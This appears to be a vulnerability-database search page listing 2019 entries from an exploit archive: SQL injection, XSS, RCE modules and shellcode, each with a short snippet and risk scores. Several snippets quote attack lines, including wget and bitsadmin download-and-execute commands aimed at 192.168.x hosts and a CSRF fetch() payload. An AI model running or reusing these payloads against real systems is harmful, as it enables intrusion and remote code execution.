Lucene search
K

39001 matches found

0day.today
0day.today
added 2019/07/08 12:0 a.m.236 views

WordPress Like Button 1.6.0 Plugin - Authentication Bypass Vulnerability

Exploit for php platform in category web applications Exploit Title: WP Like Button 1.6.0 - Auth Bypass Exploit Author: Benjamin Lim Vendor Homepage: http://www.crudlab.com Software Link: https://wordpress.org/plugins/wp-like-button/ Version: 1.6.0 CVE : CVE-2019-13344 1. Product & Service...

5.3AI score0.45095EPSS
Exploits5
0day.today
0day.today
added 2019/07/08 12:0 a.m.342 views

Cisco Data Center Network Manager 11.1(1) Remote Code Execution Exploit

Cisco Data Center Network Manager DCNM versions 11.11 and below suffer from authentication bypass, arbitrary file upload, arbitrary file download, and information disclosure vulnerabilities. Authentication Bypass and Arbitrary File Upload leading to remote code execution on Cisco Data Center...

10CVSS0.5AI score0.8378EPSS
Exploits8
0day.today
0day.today
added 2019/07/08 12:0 a.m.311 views

Sony BRAVIA Smart TV Denial Of Service Vulnerability

Sony BRAVIA Smart TV Denial Of Service ADVISORY INFORMATION TITLE: Two vulnerabilities found in Sony BRAVIA Smart TVs ADVISORY URL: CVE-2019-11889 https://www.darkmatter.ae/xen1thlabs/sony-remote-denial-of-service-triggered-over-vulnerability-hbbtv-xl-19-014/ CVE-2019-11890...

7.5CVSS7.5AI score0.04383EPSS
Exploits2
0day.today
0day.today
added 2019/07/07 12:0 a.m.458 views

Karenderia CMS 5.3 SQL Injection Vulnerability

Exploit for php platform in category web applications =========================================================================================== Exploit Title: Karenderia CMS 5.3 - Multiple SQL Vuln. Exploit Author: Mehmet EMIROGLU Vendor Homepage: email protected Software Link:...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/07/07 12:0 a.m.503 views

Huawei HG530 Cross Site Request Forgery Vulnerability

Exploit for hardware platform in category web applications Multiple CSRF reboot and restore Vulnerability =========================== The Huawei HG530 suffers from multiple CSRF vulnerability allows local attackers to reboot the device or to restore to factory Configuration. ================== Th...

0.3AI score
Exploits0
0day.today
0day.today
added 2019/07/05 12:0 a.m.172 views

Karenderia Multiple Restaurant System 5.3 - Local File Inclusion Vulnerability

Exploit for php platform in category web applications =========================================================================================== Exploit Title: Karenderia CMS 5.1 - LFI Vuln. Dork: N/A Date: 04-07-2019 Exploit Author: Mehmet EMIROGLU Software Link:...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/07/05 12:0 a.m.268 views

Microsoft Exchange 2003 - base64-MIME Remote Code Execution Exploit

Python 2.7 included with ImmunityDBG Exchange 2003 SP0 base64-MIME memory corruption NSA's ENGLISHMANSDENTIST Platform: Windows Server 2003 R2 Shout out to the Equation Group, NSA Tailored Access Operations Author: Charles Truscott @r0ss1n1 Shout out to Offensive Security, from Australia with Lov...

10CVSS0.3AI score0.6616EPSS
Exploits2
0day.today
0day.today
added 2019/07/03 12:0 a.m.229 views

BKS EBK Ethernet-Buskoppler Pro Shell Upload Vulnerability

BKS EBK Ethernet-Buskoppler Pro versions prior to 3.01 suffer from a remote shell upload vulnerability. Product: BKS EBK Ethernet-Buskoppler Pro Manufacturer: BKS GmbH Affected Versions: 3.01 Vulnerability Type: Unrestricted Upload of File with Dangerous Type CWE-434 Risk Level: High Solution...

0.2AI score0.02197EPSS
Exploits3
0day.today
0day.today
added 2019/07/03 12:0 a.m.227 views

Google ChromeOS SafeSetID LSM Transitive Trust Exploit

ChromeOS: multiple issues in SafeSetID LSM I decided to take a look at the new SafeSetID LSM that ChromeOS upstreamed and found several issues. Since this LSM is already running on Pixelbook on the stable channel, I'm filing this as a security bug. This LSM restricts the use of CAPSETUID by...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/07/03 12:0 a.m.426 views

Hawtio 2.5.0 Server Side Request Forgery Vulnerability

Exploit for java platform in category web applications Hawtio Server-Side Request Forgery Introduction ============ Hawtio https://hawt.io/ is a modular web console for managing Java. CipherTechs discovered that Hawtio up to and including version 2.5.0 is vulnerable to unauthenticated Server-Side...

0.26803EPSS
Exploits3
0day.today
0day.today
added 2019/07/03 12:0 a.m.308 views

Symantec DLP 15.5 MP1 - Cross-Site Scripting Vulnerability

Exploit for multiple platform in category web applications Exploit Title: Persistent XSS on Symantec DLP = 15.5 MP1 Exploit Author: Chapman Schleiss Vendor Homepage: https://www.symantec.com/ Software Link: https://support.symantec.com/us/en/mysymantec.html Version: = 15.5 MP1 CVE : 2019-9701...

3.5CVSS5.2AI score0.01763EPSS
Exploits2
0day.today
0day.today
added 2019/07/02 12:0 a.m.88 views

PowerPanel Business Edition - Cross-Site Scripting Vulnerability

Exploit for linux platform in category web applications Exploit Title: PowerPanel Business Edition - Stored Cross Site Scripting SNMP trap receivers Google Dork: None Exploit Author: Joey Lane Vendor Homepage: https://www.cyberpowersystems.com Software Link:...

7.4AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.91 views

ZoneMinder 1.32.3 - Cross-Site Scripting Vulnerability

Exploit for php platform in category web applications Exploit Title: ZoneMinder 1.32.3 - Stored Cross Site Scripting filters Google Dork: None Exploit Author: Joey Lane Vendor Homepage: https://zoneminder.com Software Link: https://github.com/ZoneMinder/zoneminder/releases Version: 1.32.3 Tested...

Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.108 views

CiuisCRM 1.6 - eventType SQL Injection Vulnerability

Exploit for php platform in category web applications =========================================================================================== Exploit Title: CiuisCRM 1.6 - 'eventType' SQL Inj. Exploit Author: Mehmet EMİROĞLU Vendor Homepage: https://codecanyon.net/item/ciuis-crm/20473489...

0.2AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.132 views

FaceSentry Access Control System 6.4.8 - Remote Root Exploit

Exploit for hardware platform in category web applications !/usr/bin/env python -- coding: utf-8 -- FaceSentry Access Control System 6.4.8 Remote Root Exploit Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.329 views

FaceSentry Access Control System 6.4.8 - Remote SSH Root Exploit

Exploit for hardware platform in category web applications !/usr/bin/env python -- coding: utf-8 -- FaceSentry Access Control System 6.4.8 Remote SSH Root Access Exploit Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7....

7.1AI score0.0117EPSS
Exploits12
0day.today
0day.today
added 2019/07/02 12:0 a.m.168 views

MacOS X #TimeMachine - (tmdiagnose) Command Injection Privilege Escalation Exploit #RCE

Exploit for macOS platform in category local exploits This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Mac OS X TimeMachine tmdiagnose Command Injection Privilege Escalation', 'Description' = %q...

0.2AI score0.02919EPSS
Exploits4
0day.today
0day.today
added 2019/07/02 12:0 a.m.108 views

Varient 1.6.1 - SQL Injection Vulnerability

Exploit for multiple platform in category web applications =========================================================================================== Exploit Title: Varient 1.6.1 SQL Inj. Exploit Author: Mehmet EMIROGLU Vendor Homepage: https://varient.codingest.com/ Software Link:...

0.3AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.111 views

FaceSentry Access Control System 6.4.8 - Remote Command Injection Vulnerability

Exploit for hardware platform in category web applications FaceSentry Access Control System 6.4.8 Remote Command Injection Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0 build...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.127 views

CyberPanel 1.8.4 - Cross-Site Request Forgery Vulnerability

Exploit for multiple platform in category web applications Title: CyberPanel Administrator Account Takeover fetch'https://SERVERIP:8090/users/saveModifications', method: 'POST', credentials: 'include', headers: 'Content-Type': 'text/plain', body:...

0.1AI score0.00838EPSS
Exploits5
0day.today
0day.today
added 2019/07/02 12:0 a.m.107 views

SAP Crystal Reports - Information Disclosure Vulnerability

Exploit for multiple platform in category web applications Exploit Title: Sensitive Information Disclosure in SAP Crystal Reports Exploit Author: Mohamed M.Fouad - From SecureMisr Company Vendor Homepage: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=517899114 Version: SAP Crystal...

5CVSS0.1AI score0.06609EPSS
Exploits4
0day.today
0day.today
added 2019/07/02 12:0 a.m.192 views

Linux/ARM64 - mmap() + read() stager + execve("/bin/sh", NULL, NULL) Shellcode (60 Bytes

/ Title: Linux/ARM64 - mmap + read stager + execve"/bin/sh", NULL, NULL Shellcode 60 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description:...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.106 views

FaceSentry Access Control System 6.4.8 - Cross-Site Request Forgery Vulnerability

Exploit for hardware platform in category web applications FaceSentry Access Control System 6.4.8 Cross-Site Request Forgery Vendor: iWT Ltd. Product web page: http://www.iwt.com.hk Affected version: Firmware 6.4.8 build 264 Algorithm A16 Firmware 5.7.2 build 568 Algorithm A14 Firmware 5.7.0 buil...

0.4AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.156 views

Linux/ARM64 - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (140 bytes)

/ Title: Linux/ARM64 - Reverse ::1:4444/TCP Shell /bin/sh +IPv6 Shellcode 140 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.251 views

Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (164 bytes)

/ Title: Linux/ARM64 - Bind 4444/TCP Shell /bin/sh + Null-Free Shellcode 164 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu...

7.4AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.276 views

Linux/ARM64 - Read /etc/passwd Shellcode (120 Bytes)

/ Title: Linux/ARM64 - Read /etc/passwd Shellcode 120 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xerus development...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.213 views

Linux/ARM64 - execve("/bin/sh", NULL, NULL) Shellcode (40 Bytes)

/ Title: Linux/ARM64 - execve"/bin/sh", NULL, NULL Shellcode 40 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xerus...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.221 views

Linux/ARM64 - Egghunter (PWN!PWN!) + execve("/bin/sh", NULL, NULL) + mprotect() Shellcod

/ Title: Linux/ARM64 - Egghunter PWN!PWN! + execve"/bin/sh", NULL, NULL + mprotect Shellcode 88 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu...

7.4AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.150 views

Linux Mint 18.3-19.1 - yelp Command Injection Exploit

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Exploit from github repro: https://github.com/b1ack0wl/linuxmintpoc class MetasploitModule "Linux Mint 'yelp' URI handler command injection vulnerability", 'Description'...

0.1AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.1364 views

Apache Tomcat CGIServlet enableCmdLineArguments Remote Code Execution Exploit

This Metasploit module exploits a vulnerability in Apache Tomcat's CGIServlet component. When the enableCmdLineArguments setting is set to true, a remote user can abuse this to execute system commands, and gain remote code execution. This module requires Metasploit: https://metasploit.com/downloa...

9.3CVSS0.6AI score0.99652EPSS
Exploits9
0day.today
0day.today
added 2019/07/02 12:0 a.m.218 views

Serv-U FTP Server 15.1.7 prepareinstallation Privilege Escalation Exploit

This Metasploit module attempts to gain root privileges on systems running Serv-U FTP Server versions prior to 15.1.7. The Serv-U executable is setuid root, and uses ARGV0 in a call to system, without validation, when invoked with the -prepareinstallation flag, resulting in command execution with...

6.5CVSS1.4AI score0.65981EPSS
Exploits13
0day.today
0day.today
added 2019/07/02 12:0 a.m.103 views

Sahi pro 8.x - Directory Traversal Exploit

Exploit for multiple platform in category web applications Exploit Title: Sahi pro 8.x Directory traversal Exploit Author: Alexander Bluestein Vendor Homepage: https://sahipro.com/ Software Link: https://sahipro.com/downloads-archive/ Version: 8.0 Tested on: Linux Ubuntu / Windows 7 CVE:...

7.1AI score0.2723EPSS
Exploits6
0day.today
0day.today
added 2019/07/02 12:0 a.m.206 views

Linux/ARM64 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (176 bytes)

/ Title: Linux/ARM64 - Bind 4444/TCP Shell /bin/sh + IPv6 Shellcode 176 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.640 views

Linux/ARM64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (128 bytes)

/ Title: Linux/ARM64 - Reverse 127.0.0.1:4444/TCP Shell /bin/sh + Null-Free Shellcode 128 bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/07/02 12:0 a.m.457 views

Centreon 19.04 - Remote Code Execution Exploit #RCE

Exploit for php platform in category web applications !/usr/bin/python ''' Exploit Title: Centreon v19.04 authenticated Remote Code Execution Date: 28/06/2019 Exploit Author: Askar @mohammadaskar2 CVE : CVE-2019-13024 Vendor Homepage: https://www.centreon.com/ Software link:...

8.7AI score0.32156EPSS
Exploits6
0day.today
0day.today
added 2019/07/02 12:0 a.m.315 views

Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)

/ ;Category: Shellcode ;Title: GNU/Linux x86 - execve /bin/sh using JMP-CALL-POP technique 21 bytes ;Author: kiriknik ;Date: 01/07/2019 ;Architecture: Linux x86 =========== Asm Source =========== global start section .text start: jmp short callshellcode shellcode: pop ebx xor eax,eax mov al, 11 i...

0.2AI score
Exploits0
0day.today
0day.today
added 2019/07/01 12:0 a.m.311 views

Linux/ARM64 - execve(/bin/sh, [/bin/sh], NULL) Shellcode (48 Bytes)

/ Title: Linux/ARM64 - execve"/bin/sh", "/bin/sh", NULL Shellcode 48 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu Xenial Xer...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/07/01 12:0 a.m.70 views

WorkSuite PRM 2.4 - password SQL Injection Vulnerability

Exploit for php platform in category web applications =========================================================================================== Exploit Title: WorkSuite PRM 2.4 - 'password' SQL Inj. Exploit Author: Mehmet EMİROĞLU Vendor Homepage:...

0.1AI score
Exploits0
0day.today
0day.today
added 2019/07/01 12:0 a.m.314 views

Linux/ARM64 - Jump Back Shellcode + execve(/bin/sh, NULL, NULL) Shellcode (8 Bytes)

/ Title: Linux/ARM64 - Jump Back Shellcode + execve"/bin/sh", NULL, NULL Shellcode 8 Bytes Date: 2019-06-30 Tested: Ubuntu 16.04 aarch64 Author: Ken Kitahara Compilation: gcc -o loader loader.c ubuntu@ubuntu:/works$ lsbrelease -a No LSB modules are available. Distributor ID: Ubuntu Description:...

7.4AI score
Exploits0
0day.today
0day.today
added 2019/06/30 12:0 a.m.170 views

LibreNMS 1.46 - addhost Remote Code Execution Exploit

Exploit for php platform in category web applications !/usr/bin/python ''' Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution Date: 24/12/2018 Exploit Author: Askar @mohammadaskar2 CVE : CVE-2018-20434 Vendor Homepage: https://www.librenms.org/ Version: v1.46 Tested on: Ubuntu 18.0...

10CVSS0.71487EPSS
Exploits9
0day.today
0day.today
added 2019/06/30 12:0 a.m.192 views

Linux/x86 - Chmod + Execute (/usr/bin/wget 192.168.1.93//x) Hide Output Shellcode (129 bytes)

Linux/x86 - Chmod + Execute /usr/bin/wget http://192.168.1.93//x + Hide Output Shellcode 129 bytes / ; Shellcode 129 Bytes ; download via wget + chmod + execute shellcode + hide output ; Exec: /usr/bin/wget http://192.168.1.93//x /dev/null 2&1 ; global start section .text start: ;fork xor eax,eax...

7.4AI score
Exploits0
0day.today
0day.today
added 2019/06/30 12:0 a.m.249 views

Windows/x86 - Start iexplore.exe (http://192.168.10.10/) Shellcode (191 Bytes)

191 bytes small Windows/x86 start iexplore.exe shellcode. / Title: start iexplore.exe Author: Joseph McDonagh Shellcode length 191 Could be smaller if the app your are exploiting loads msvcrt. Purpose: Use the start command to open internet explorer and connect to a malicious web server The comma...

7.4AI score
Exploits0
0day.today
0day.today
added 2019/06/30 12:0 a.m.616 views

Windows Escalate UAC Protection Bypass Via SilentCleanup Exploit

There's a task in Windows Task Scheduler called "SilentCleanup" which, while it's executed as Users, automatically runs with elevated privileges. When it runs, it executes the file %windir%\system32\cleanmgr.exe. Since it runs as Users, and we can control user's environment variables, %windir%...

0.7AI score
Exploits0
0day.today
0day.today
added 2019/06/27 12:0 a.m.225 views

Linux/x86 - ASCII AND, SUB, PUSH, POPAD Encoder Shellcode

!/usr/bin/env python3 INTRODUCTION Encoder Title: ASCII shellcode encoder via AND, SUB, PUSH, POPAD Date: 26.6.2019 Encoder Author: Petr Javorik, www.mmquant.net Tested on: Linux ubuntu 3.13.0-32-generic, x86 Special thx to: Corelanc0d3r for intro to this technique Description: This encoder is...

Exploits0
0day.today
0day.today
added 2019/06/27 12:0 a.m.256 views

AMD Secure Encrypted Virtualization (SEV) Key Recovery Vulnerability

AMD Secure Encrypted Virtualization SEV is a hardware memory encryption feature. SEV protects guest virtual machines from the hypervisor, provides confidentiality guarantees at runtime and remote attestation at launch time. The SEV elliptic-curve ECC implementation was found to be vulnerable to a...

0.5AI score0.01609EPSS
Exploits1
0day.today
0day.today
added 2019/06/27 12:0 a.m.92 views

D-Link Administrative Password Disclosure Vulnerability

D-Link models DIR-652, DIR-615, DIR-827, DIR-615, DIR-657, and DIR-825 suffer from an administrative password disclosure vulnerability. DLink Administrative Password Disclosure Vulnerability The problem in the following models : DIR-652 DIR-615 DIR-827 DIR-615 DIR-657 DIR-825 If login to web...

7.1AI score
Exploits0
0day.today
0day.today
added 2019/06/27 12:0 a.m.761 views

Windows/x86 - bitsadmin Download and Execute Shellcode (210 Bytes)

/ ; Windows/x86 - bitsadmin Download and Execute http://192.168.10.10/evil.exe c:\evil.exe Shellcode 210 Bytes ; Shellcode Title : bitsadmin download and execute ; Shellcode Author : Joseph McDonagh ; Date June 26, 2019 ; Shellcode Length 210 ; However, if the application you are exploiting alrea...

0.6AI score
Exploits0
0day.today
0day.today
added 2019/06/26 12:0 a.m.264 views

AZADMIN CMS 1.0 - SQL Injection Vulnerability

Exploit for php platform in category web applications + Sql Injection on AZADMIN CMS of HIDEA v1.0 + Date: 24/06/2019 + CWE Number : CWE-89 + Risk: High + Author: Felipe Andrian Peixoto + Vendor Homepage: https://www.hidea.com/ + Contact: email protected + Tested on: Windows 7 and Linux +...

0.2AI score
Exploits0
0day.today
0day.today
added 2019/06/26 12:0 a.m.590 views

dotProject 2.1.9 - SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title: dotProject 2.1.9 - Multiple Sql Injection Poc Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: https://dotproject.net Software Link: https://github.com/dotproject/dotProject/archive/v2.1.9.zip Version: 2.1.9...

6.8CVSS7.8AI score0.23129EPSS
Exploits7
0day.today
0day.today
added 2019/06/26 12:0 a.m.473 views

SeedDMS < 5.1.11 - (out.UsrMgr.php) Cross-Site Scripting Vulnerability

Exploit for php platform in category web applications Exploit Title: Persistent Cross-Site Scripting or Stored XSS in out/out.UsrMgr.php in SeedDMS before 5.1.11 Exploit Author: Nimit Jainhttps://secfolks.blogspot.com Vendor Homepage: https://www.seeddms.org Software Link:...

3.5CVSS5.6AI score0.02569EPSS
Exploits5
Total number of security vulnerabilities39001